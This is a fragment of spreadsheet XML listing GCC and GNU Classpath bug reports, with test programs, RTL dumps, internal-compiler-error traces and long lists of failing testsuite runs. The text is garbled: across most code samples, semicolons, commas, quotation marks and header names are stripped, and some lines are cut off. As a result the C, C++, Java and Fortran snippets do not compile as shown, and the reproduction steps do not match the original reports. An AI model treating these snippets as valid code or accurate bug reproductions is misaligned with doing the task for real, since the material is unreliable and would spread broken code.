System: Linux karma 2.6.8.1 #20 Mon Sep 13 23:48:47 EDT 2004 i686 i686 i386 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /home/sss/gcc/gcc/configure --prefix=/usr/local/gcc --enable-threads=posix --enable-long-long --enable-languages=cc++f95
How-To-Repeat:
Compile the following with -O3:
-------------------------------------------------------------------
extern C int printf (const char* ...)
unsigned short int foo(unsigned int* ptr) {
  return *ptr
}
unsigned rawdata = 0
int main ()
{
  if ((foo(&amp;rawdata) &amp; 0x8000) != 0)
    printf (fail\n)
  return 0
}
-------------------------------------------------------------------</t>
  </si>
  <si>
    <t>GCC-46211</t>
  </si>
  <si>
    <t>FAIL: gcc.c-torture/execute/20101011-1.c compilation on powerpc-*-*</t>
  </si>
  <si>
    <t>The test gcc.c-torture/execute/20101011-1.c does not compile on powerpc-*-*:
/opt/gcc/gcc-4.6-work/gcc/testsuite/gcc.c-torture/execute/20101011-1.c: In function 'main':
/opt/gcc/gcc-4.6-work/gcc/testsuite/gcc.c-torture/execute/20101011-1.c:39:11: error: 'SIGFPE' undeclared (first use in this function)
/opt/gcc/gcc-4.6-work/gcc/testsuite/gcc.c-torture/execute/20101011-1.c:39:11: note: each undeclared identifier is reported only once for each function it appears in
/opt/gcc/gcc-4.6-work/gcc/testsuite/gcc.c-torture/execute/20101011-1.c:39:19: error: 'sigfpe' undeclared (first use in this function)
See
http://gcc.gnu.org/ml/gcc-testresults/2010-10/msg02212.html
http://gcc.gnu.org/ml/gcc-testresults/2010-10/msg02217.html
AFAICT this test introduced at revision 165884 never passed.</t>
  </si>
  <si>
    <t>CLASSPATH-27106</t>
  </si>
  <si>
    <t>BasicTextUI.getNextVisualPositionFrom is a stub</t>
  </si>
  <si>
    <t>BasicTextUI.getNextVisualPositionFrom is a stub and should be implemented.</t>
  </si>
  <si>
    <t>GCC-4879</t>
  </si>
  <si>
    <t>std::ofstream failing to detect out of space?</t>
  </si>
  <si>
    <t>std::ofstream is not detecting an out of space
condition.  I would expect badbit to be set on the
stream but there is no indication of any problems
in the stream.
Release:
unknown
Environment:
Seen on x86 linux redhat 6.2 &amp; 7.1
How-To-Repeat:
To reproduce compile &amp; run the following program.
The named file (/boot/xxx) must be in a partition with
no free space.  For my tests I simply filled up the
/boot partition of a linux machine
(cat /dev/zero &gt; /boot/foo) and ran this.
-----------------------------------------
#include 
#include 
int main()
{
    const char* data(this is the text for the file\n)
    std::ofstream ofs(/boot/xxx)
    for (unsigned i = 0 i &lt; strlen(data) ++i)
    {
        ofs.put(data[i])
    }
    ofs.close()
    if (ofs.good())
    {
        std::cout &lt;&lt; stream is good\n
    }
    if (ofs.bad())
    {
        std::cout &lt;&lt; stream is bad\n
    }
    if (ofs.fail())
    {
        std::cout &lt;&lt; stream is fail\n
    }
    return 0
}
----------------
Running this you will see that /boot/xxx gets created as
a zero-length file but the program prints out
stream is good.</t>
  </si>
  <si>
    <t>garsh</t>
  </si>
  <si>
    <t>GCC-7434</t>
  </si>
  <si>
    <t>[x86_64] ICE in change_address_1 at emit-rtl.c:1934</t>
  </si>
  <si>
    <t>[gb@gauss gcc]$ ./cc1 ice.c
 main
ice.c: In function `main':
ice.c:9: Internal compiler error in change_address_1 at emit-rtl.c:1934
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
GNU C version 3.2 20020729 (prerelease)
Environment:
x86_64-mandrake-linux-gnu
How-To-Repeat:
Try to compile the following testcase extracted from HDF 5 soures:
[gb@gauss gcc]$ cat ice.c
int main(void)
{
  static const int align_g[] = { 1 2 4 8 16 }
  char * buf
  int i = 0
  volatile long double val = 0
  val = *((long double *)(buf + align_g[i]))
  return 0
}
This ICEs whatever optimization level you choose.</t>
  </si>
  <si>
    <t>CLASSPATH-26121</t>
  </si>
  <si>
    <t>ObjectInputStream.readNextBlock() doesn't handle TC_RESET</t>
  </si>
  <si>
    <t>This program shows the problem:
import java.io.*
class ser
{
  public static void main(String[] args) throws Exception
  {
    ByteArrayOutputStream baos = new ByteArrayOutputStream()
    ObjectOutputStream oos = new ObjectOutputStream(baos)
    oos.reset()
    oos.writeByte(123)
    oos.close()
    ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(baos.toByteArray()))
    System.out.println(ois.read())
  }
}</t>
  </si>
  <si>
    <t>GCC-8023</t>
  </si>
  <si>
    <t>Miscompilation of function grokdeclarator in c-decl.c at -O1 and above</t>
  </si>
  <si>
    <t>The following test program
  char short *x23
should warn that a long or short was specified with
char.  In trying to determine why the compiler doesn't
warn I found that the variable specbits is treated in
inconsistently.
The type of specbits is int (32 bits) but it appears that
the compiler decides to treat it as a long (64 bits).  However
there is a mixup in the subreg access.  In some cases it
is accessed at offset 4 (correct) and in other cases it
is accessed at offset 0 (incorrect).
We have the following code and corresponding rtl at -O1
for the initialization of specbits at 387 of c-decl.c:
  specbits |= 1 &lt;&lt; (int) i
(note 511 510 512 (grokdeclarator.c) 387)
(insn 512 511 513 0000000000000000 (set (reg:SI 215)
        (minus:SI (const_int 31 [0x1f])
            (subreg:SI (reg/v:DI 182) 4))) -1 (nil)
    (nil))
(insn 513 512 514 0000000000000000 (set (reg:SI 214)
        (ashift:SI (const_int 1 [0x1])
            (minus:SI (const_int 31 [0x1f])
                (reg:SI 215)))) -1 (nil)
    (expr_list:REG_EQUAL (ashift:SI (const_int 1 [0x1])
            (subreg:SI (reg/v:DI 182) 4))
        (nil)))
(insn 514 513 515 0000000000000000 (set (reg:SI 216)
        (ior:SI (reg:SI 214)
            (subreg/s:SI (reg/v:DI 74) 4))) -1 (nil)
    (nil))
(insn 515 514 516 0000000000000000 (set (reg/v:DI 74)
        (sign_extend:DI (reg:SI 216))) -1 (nil)
    (nil))
Then up to line 478 specbits is accessed at offset 4
in DI 74 but a line 478
      if ((specbits &amp; 1 &lt;&lt; (int) RID_LONG)
          &amp;&amp; (specbits &amp; 1 &lt;&lt; (int) RID_SHORT))
        error (both long and short specified for `%s' name)
the following rtl is generated
(note 882 881 883 (grokdeclarator.c) 478)
(insn 883 882 884 0000000000000000 (set (reg:SI 328)
        (const_int 132 [0x84])) -1 (nil)
    (nil))
(insn 884 883 885 0000000000000000 (set (reg:SI 327)
        (and:SI (subreg:SI (reg/v:DI 74) 0)
            (reg:SI 328))) -1 (nil)
    (nil))
So the generated assembly code ands SI 327 with the
high-order 32 bits instead of the low-order 32 bits
of DI 74.  This is why the proper warnings are not
being generated.
This doesn't appear to be a regression as 3.2 has the
same behavior as 3.3.  The code generated at -O0 is
ok.
Release:
gcc 3.2 and 3.3 (experimental)
Environment:
hppa64-hp-hpux11.00</t>
  </si>
  <si>
    <t>GCC-16559</t>
  </si>
  <si>
    <t>Incorrect code generated for function pointer</t>
  </si>
  <si>
    <t>Under certain conditions gcc 3.3 generates
        addl r14 = @ltoffx(os_boot_rendez#) r1
        ...
        ld8.mov r14 = [r14] os_boot_rendez#
to access the function os_boot_rendez which is incorrect.</t>
  </si>
  <si>
    <t>GCC-16388</t>
  </si>
  <si>
    <t>[ABI] POD long double alignment shifting [3.2/3.3/3.4]</t>
  </si>
  <si>
    <t>First reported by Michael Wong.
Can be reproduced on powerpc-linux as well.
For attached test case:
3.2.3
        size    align
sa      12      16
sa.a    12      4
sb      16      4
sb.b    12      4
3.3.3
        size    align
sa      12      16
sa.a    12      4
sb      16      4
sb.b    12      4
3.4.1
        size    align
sa      12      4
sa.a    12      4
sb      16      4
sb.b    12      4</t>
  </si>
  <si>
    <t>GCC-31211</t>
  </si>
  <si>
    <t>wrong code generated for pointer returning function as actual argument</t>
  </si>
  <si>
    <t>With a recent gfortran the following compiles but generates the wrong results:
MODULE T
  INTERFACE cp_log
     MODULE PROCEDURE cp_logger_log
  END INTERFACE
  TYPE cp_logger_type
    INTEGER :: a
  END TYPE cp_logger_type
  PUBLIC :: cp_log cp_logger_type
CONTAINS
  SUBROUTINE cp_logger_log(logger)
    TYPE(cp_logger_type) POINTER ::logger
  END SUBROUTINE
  FUNCTION cp_get_default_logger() RESULT(res)
    TYPE(cp_logger_type) POINTER ::res
    NULLIFY(RES)
  END FUNCTION cp_get_default_logger
END MODULE T
USE T
 CALL cp_log(cp_get_default_logger())
END</t>
  </si>
  <si>
    <t>GCC-39643</t>
  </si>
  <si>
    <t>[4.5 Regression]: cris-elf gcc.dg/torture/builtin-math-3.c  -O1 and -Os sincos one</t>
  </si>
  <si>
    <t>With revision 145488 this test passed.
From revision 145495 and on this test has failed as follows:
...
Running /tmp/hpautotest-gcc1/gcc/gcc/testsuite/gcc.dg/torture/dg-torture.exp ...
FAIL: gcc.dg/torture/builtin-math-3.c  -O1  (test for excess errors)
FAIL: gcc.dg/torture/builtin-math-3.c  -Os  (test for excess errors)
...
With the message in gcc.log being:
builtin-math-3.c:(.text+0x88): undefined reference to `_link_error'
builtin-math-3.c:(.text+0xfe): undefined reference to `_link_error'
builtin-math-3.c:(.text+0x174): undefined reference to `_link_error'
builtin-math-3.c:(.text+0x1aa): undefined reference to `_link_error'
builtin-math-3.c:(.text+0x220): undefined reference to `_link_error'
/tmp/ccKBGOIU.o:builtin-math-3.c:(.text+0x296): more undefined references to `_link_error' follow
The lack of line-numbers is of course unhelpful but with -g added the link error becomes for both -O1 and -Os:
builtin-math-3.o: In function `main':
/tmp/hpautotest-gcc1/gcc/gcc/testsuite/gcc.dg/torture/builtin-math-3.c:176: undefined reference to `_link_error'
/tmp/hpautotest-gcc1/gcc/gcc/testsuite/gcc.dg/torture/builtin-math-3.c:176: undefined reference to `_link_error'
/tmp/hpautotest-gcc1/gcc/gcc/testsuite/gcc.dg/torture/builtin-math-3.c:177: undefined reference to `_link_error'
/tmp/hpautotest-gcc1/gcc/gcc/testsuite/gcc.dg/torture/builtin-math-3.c:177: undefined reference to `_link_error'
Author of patches in suspect revision range CC:ed.</t>
  </si>
  <si>
    <t>GCC-57106</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] -fcompare-debug failure with -O2 -fschedule-insns -funroll-all-loops</t>
  </si>
  <si>
    <t>Created attachment 29967
reduced testcase
Compiler output:
$ gcc -O2 -fschedule-insns -funroll-all-loops -fcompare-debug testcase.c
gcc: error: testcase.c: -fcompare-debug failure
Tested revisions:
r198366 - fail
4.8 r198018 - fail
4.7 r198018 - OK</t>
  </si>
  <si>
    <t>GCC-47079</t>
  </si>
  <si>
    <t>[4.6 Regression] FAIL: gcc.dg/guality/nrv-1.c</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 168160:
http://gcc.gnu.org/ml/gcc-cvs/2010-12/msg00845.html
caused:
FAIL: gcc.dg/guality/nrv-1.c  -O1  line 20 a2.i[0] == 42
FAIL: gcc.dg/guality/nrv-1.c  -O2  line 20 a2.i[0] == 42
FAIL: gcc.dg/guality/nrv-1.c  -Os  line 20 a2.i[0] == 42</t>
  </si>
  <si>
    <t>GCC-21492</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] ICE in try_crossjump_to_edge</t>
  </si>
  <si>
    <t>// { dg-do compile }
// { dg-options -Os -fPIC }
extern char *bar (const char * const char *)
extern char *baz (char * const char *)
extern unsigned int fn (const char *)
static const struct C { int i } k = { 0}
struct S
{
  S (const C &amp;x unsigned int *y) : a (x) b (y) {}
  const C 
  unsigned int *b
}
struct A
{
  ~A ()
  void helper (const S 
}
struct B : private A
{
  B (const S &amp;x)
  {
    helper (x)
  }
}
char *
foo (char *x const char *y)
{
  unsigned int a
  B b (S (k 
  char *c = x
  if (bar (y foo))
    {
      baz (c foo)
      c += fn (foo)
    }
  else if (bar (y bar))
    {
      baz (c bar)
      c += fn (bar)
    }
  return x
}
causes ICE on powerpc-linux (32-bit).</t>
  </si>
  <si>
    <t>GCC-69033</t>
  </si>
  <si>
    <t>[6 regression] many internal compiler errors starting with r231928</t>
  </si>
  <si>
    <t>There are over a hundred internal compiler errors showing up on power BE and LE starting with the changes for r231928.  
Here is just one example:
seurer@genoa:~/tests/gcc$ gcc-test -c swaps-p8-1.c  -mcpu=power8 -O2
seurer@genoa:~/tests/gcc$ gcc-test -c swaps-p8-1.c  -mcpu=power8 -O3
swaps-p8-1.c:35:1: internal compiler error: in increase_alignment at symtab.c:2104
 }
 ^
0x1036887b symtab_node::increase_alignment(unsigned int)
	/home/seurer/gcc/gcc-test/gcc/symtab.c:2104
0x10b1c28f increase_alignment
	/home/seurer/gcc/gcc-test/gcc/tree-vectorizer.c:817
0x10b1c28f execute
	/home/seurer/gcc/gcc-test/gcc/tree-vectorizer.c:855
These were all the failures:
FAIL: g++.dg/torture/pr44069.C   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: g++.dg/torture/pr44069.C   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: g++.dg/torture/pr44069.C   -O3 -g  (internal compiler error)
FAIL: g++.dg/torture/pr44069.C   -O3 -g  (test for excess errors)
FAIL: g++.dg/torture/pr49644.C   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: g++.dg/torture/pr49644.C   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: g++.dg/torture/pr49644.C   -O3 -g  (internal compiler error)
FAIL: g++.dg/torture/pr49644.C   -O3 -g  (test for excess errors)
FAIL: g++.dg/torture/pr55875.C   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: g++.dg/torture/pr55875.C   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: g++.dg/torture/pr55875.C   -O3 -g  (internal compiler error)
FAIL: g++.dg/torture/pr55875.C   -O3 -g  (test for excess errors)
FAIL: g++.dg/tree-ssa/pr34355.C  -std=gnu++11 (internal compiler error)
FAIL: g++.dg/tree-ssa/pr34355.C  -std=gnu++11 (test for excess errors)
FAIL: g++.dg/tree-ssa/pr34355.C  -std=gnu++14 (internal compiler error)
FAIL: g++.dg/tree-ssa/pr34355.C  -std=gnu++14 (test for excess errors)
FAIL: g++.dg/tree-ssa/pr34355.C  -std=gnu++98 (internal compiler error)
FAIL: g++.dg/tree-ssa/pr34355.C  -std=gnu++98 (test for excess errors)
FAIL: gcc.c-torture/compile/pr25224.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: gcc.c-torture/compile/pr25224.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: gcc.c-torture/compile/pr25224.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/compile/pr25224.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/20010915-1.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: gcc.c-torture/execute/20010915-1.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: gcc.c-torture/execute/20010915-1.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/20010915-1.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/20020402-1.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: gcc.c-torture/execute/20020402-1.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: gcc.c-torture/execute/20020402-1.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/20020402-1.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/20030105-1.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: gcc.c-torture/execute/20030105-1.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: gcc.c-torture/execute/20030105-1.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/20030105-1.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/20040218-1.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/20040218-1.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/20041126-1.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: gcc.c-torture/execute/20041126-1.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: gcc.c-torture/execute/20041126-1.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/20041126-1.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/20070919-1.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/20070919-1.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/20071210-1.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/20071210-1.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/920501-5.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/920501-5.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/921013-1.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: gcc.c-torture/execute/921013-1.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: gcc.c-torture/execute/921013-1.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/921013-1.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/961213-1.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: gcc.c-torture/execute/961213-1.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: gcc.c-torture/execute/961213-1.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/961213-1.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/builtins/strpbrk.c compilation  -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/ieee/acc1.c compilation  -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/ieee/acc2.c compilation  -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/loop-5.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: gcc.c-torture/execute/loop-5.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: gcc.c-torture/execute/loop-5.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/loop-5.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/mode-dependent-address.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: gcc.c-torture/execute/mode-dependent-address.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: gcc.c-torture/execute/mode-dependent-address.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/mode-dependent-address.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/pr15296.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/pr15296.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/pr32500.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: gcc.c-torture/execute/pr32500.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: gcc.c-torture/execute/pr32500.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/pr32500.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/pr47538.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: gcc.c-torture/execute/pr47538.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: gcc.c-torture/execute/pr47538.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/pr47538.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/pr49644.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: gcc.c-torture/execute/pr49644.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: gcc.c-torture/execute/pr49644.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/pr49644.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/execute/pr64006.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: gcc.c-torture/execute/pr64006.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: gcc.c-torture/execute/pr64006.c   -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/pr64006.c   -O3 -g  (test for excess errors)
FAIL: gcc.dg/ext-elim-1.c (internal compiler error)
FAIL: gcc.dg/ext-elim-1.c (test for excess errors)
FAIL: gcc.dg/torture/pr43017.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: gcc.dg/torture/pr43017.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: gcc.dg/torture/pr43017.c   -O3 -g  (internal compiler error)
FAIL: gcc.dg/torture/pr43017.c   -O3 -g  (test for excess errors)
FAIL: gcc.dg/torture/pr44913.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: gcc.dg/torture/pr44913.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: gcc.dg/torture/pr44913.c   -O3 -g  (internal compiler error)
FAIL: gcc.dg/torture/pr44913.c   -O3 -g  (test for excess errors)
FAIL: gcc.dg/torture/pr45678-2.c   -O3 -g  (internal compiler error)
FAIL: gcc.dg/torture/pr45678-2.c   -O3 -g  (test for excess errors)
FAIL: gcc.dg/torture/pr64365.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (internal compiler error)
FAIL: gcc.dg/torture/pr64365.c   -O3 -fomit-frame-pointer -funroll-loops -fpeel-loops -ftracer -finline-functions  (test for excess errors)
FAIL: gcc.dg/torture/pr64365.c   -O3 -g  (internal compiler error)
FAIL: gcc.dg/torture/pr64365.c   -O3 -g  (test for excess errors)
FAIL: gcc.dg/tree-ssa/ssa-dom-cse-2.c (internal compiler error)
FAIL: gcc.dg/tree-ssa/ssa-dom-cse-2.c (test for excess errors)
FAIL: gcc.dg/vect/costmodel/ppc/costmodel-slp-12.c (internal compiler error)
FAIL: gcc.dg/vect/costmodel/ppc/costmodel-slp-12.c (test for excess errors)
FAIL: gcc.dg/vect/costmodel/ppc/costmodel-vect-reduc-1char.c (internal compiler error)
FAIL: gcc.dg/vect/costmodel/ppc/costmodel-vect-reduc-1char.c (test for excess errors)
FAIL: gcc.dg/vect/no-fast-math-vect16.c (internal compiler error)
FAIL: gcc.dg/vect/no-fast-math-vect16.c (test for excess errors)
FAIL: gcc.dg/vect/pr31343.c (internal compiler error)
FAIL: gcc.dg/vect/pr31343.c (test for excess errors)
FAIL: gcc.dg/vect/pr31343.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/pr31343.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/pr44507.c (internal compiler error)
FAIL: gcc.dg/vect/pr44507.c (test for excess errors)
FAIL: gcc.dg/vect/pr44507.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/pr44507.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/pr45752.c (internal compiler error)
FAIL: gcc.dg/vect/pr45752.c (test for excess errors)
FAIL: gcc.dg/vect/pr45752.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/pr45752.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/pr60196-1.c (internal compiler error)
FAIL: gcc.dg/vect/pr60196-1.c (test for excess errors)
FAIL: gcc.dg/vect/pr60196-1.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/pr60196-1.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/pr60276.c (internal compiler error)
FAIL: gcc.dg/vect/pr60276.c (test for excess errors)
FAIL: gcc.dg/vect/pr60276.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/pr60276.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/pr65947-1.c (internal compiler error)
FAIL: gcc.dg/vect/pr65947-1.c (test for excess errors)
FAIL: gcc.dg/vect/pr65947-1.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/pr65947-1.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/pr65947-10.c (internal compiler error)
FAIL: gcc.dg/vect/pr65947-10.c (test for excess errors)
FAIL: gcc.dg/vect/pr65947-10.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/pr65947-10.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/pr65947-11.c (internal compiler error)
FAIL: gcc.dg/vect/pr65947-11.c (test for excess errors)
FAIL: gcc.dg/vect/pr65947-11.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/pr65947-11.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/pr65947-12.c (internal compiler error)
FAIL: gcc.dg/vect/pr65947-12.c (test for excess errors)
FAIL: gcc.dg/vect/pr65947-12.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/pr65947-12.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/pr65947-13.c (internal compiler error)
FAIL: gcc.dg/vect/pr65947-13.c (test for excess errors)
FAIL: gcc.dg/vect/pr65947-13.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/pr65947-13.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/pr65947-3.c (internal compiler error)
FAIL: gcc.dg/vect/pr65947-3.c (test for excess errors)
FAIL: gcc.dg/vect/pr65947-3.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/pr65947-3.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/pr65947-4.c (internal compiler error)
FAIL: gcc.dg/vect/pr65947-4.c (test for excess errors)
FAIL: gcc.dg/vect/pr65947-4.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/pr65947-4.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/pr65947-5.c (internal compiler error)
FAIL: gcc.dg/vect/pr65947-5.c (test for excess errors)
FAIL: gcc.dg/vect/pr65947-5.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/pr65947-5.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/pr65947-6.c (internal compiler error)
FAIL: gcc.dg/vect/pr65947-6.c (test for excess errors)
FAIL: gcc.dg/vect/pr65947-6.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/pr65947-6.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/pr65947-7.c (internal compiler error)
FAIL: gcc.dg/vect/pr65947-7.c (test for excess errors)
FAIL: gcc.dg/vect/pr65947-7.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/pr65947-7.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/pr65947-8.c (internal compiler error)
FAIL: gcc.dg/vect/pr65947-8.c (test for excess errors)
FAIL: gcc.dg/vect/pr65947-8.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/pr65947-8.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-10.c (internal compiler error)
FAIL: gcc.dg/vect/slp-10.c (test for excess errors)
FAIL: gcc.dg/vect/slp-10.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-10.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-11a.c (internal compiler error)
FAIL: gcc.dg/vect/slp-11a.c (test for excess errors)
FAIL: gcc.dg/vect/slp-11a.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-11a.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-11b.c (internal compiler error)
FAIL: gcc.dg/vect/slp-11b.c (test for excess errors)
FAIL: gcc.dg/vect/slp-11b.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-11b.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-11c.c (internal compiler error)
FAIL: gcc.dg/vect/slp-11c.c (test for excess errors)
FAIL: gcc.dg/vect/slp-11c.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-11c.c -flto -ffat-lto-objects (test for excess errors)
